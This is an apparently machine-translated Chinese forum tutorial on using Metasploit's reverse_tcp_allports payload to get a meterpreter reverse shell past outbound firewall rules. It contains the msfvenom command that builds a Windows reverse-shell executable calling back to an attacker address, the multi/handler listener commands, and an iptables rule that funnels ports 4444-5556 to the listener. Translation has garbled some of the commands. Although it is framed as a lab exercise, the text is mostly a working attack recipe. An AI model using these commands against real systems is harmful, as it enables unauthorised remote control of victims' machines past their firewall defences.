使用Metasploit绕过防火墙限制(reverse_tcp_allports)

介绍
网络地址转换通常涉及“在通过路由器或防火墙时重写IP数据包的源和/或目标地址”(来自  http://en.wikipedia.org/wiki/Network_Address_Translation
Linux内核通常拥有一个名为netfilter的数据包过滤器框架   (Project home:netfilter.org)。该框架使具有适当数量的网卡(接口)的Linux机器成为能够进行NAT的路由器。我们将使用命令实用程序'iptables'来创建用于修改和过滤数据包的复杂规则。关于NAT的重要规则 - 不是很令人惊讶 - 在'nat'表中找到。该表有三个预定义的链:  PREROUTING,  OUTPUT  和  POSTROUTING。
ALL-PORTS有效载荷: -
'reverse_tcp'只允许连接到一个端口,但是如果受害者阻止了除少数端口之外的传出连接。然后,攻击者很难设置一个侦听端口。'reverse_tcp _allports'用于强制强制{1-65535}的所有端口。
我们使用iptables重新路由到侦听端口的任何传入连接。
让我们开始
我们使用metasploit创建一个meterpreter反向shell。
msfvenom -p windows / meterpreter / reverse_tcp_allports lhost = 192.168.1.139 lport = 4444 -f exe> reverse_shell.exe
我们现在使用metasploit设置我们的监听器。
msf>使用exploit / multi / handler
msf exploit(multi / handler)> set payload windows / meterpreter / reverse_tcp_allports
msf exploit(multi / handler)> set lhost 192.168.1.139
msf exploit(multi / handler)> set lport 4444
msf exploit(多/处理程序)>运行
现在我们在Windows机器上设置防火墙。我们打开防火墙并选择出站连接。
我们选择端口来定义我们需要阻止的端口。
我们选择tcp来阻止tcp包,并从4444-5555中选择端口。
现在我们选择“阻止连接”来阻止来自这些端口的所有传出流量包。
现在我们选择防火墙适用的连接类型。
我们现在将防火墙规则命名为“REVERSE_SHELL”,然后单击“完成”以应用规则。
现在我们定义iptables以重新路由到端口4444-5556的所有流量到端口4444.这样当反向shell尝试连接到我们在端口5556上的系统时,它将被重新路由到端口4444。
iptables -A PREROUTING -t nat -p tcp -dport 4444:5556 -j REDIRECT -to-port 4444
一旦受害者运行文件,我们就会获得反向shell。
转载请注明本文链接: http://www.mayidui.net/t2287.html
话题: 渗透
游客
登录后才可以回帖,登录 或者 注册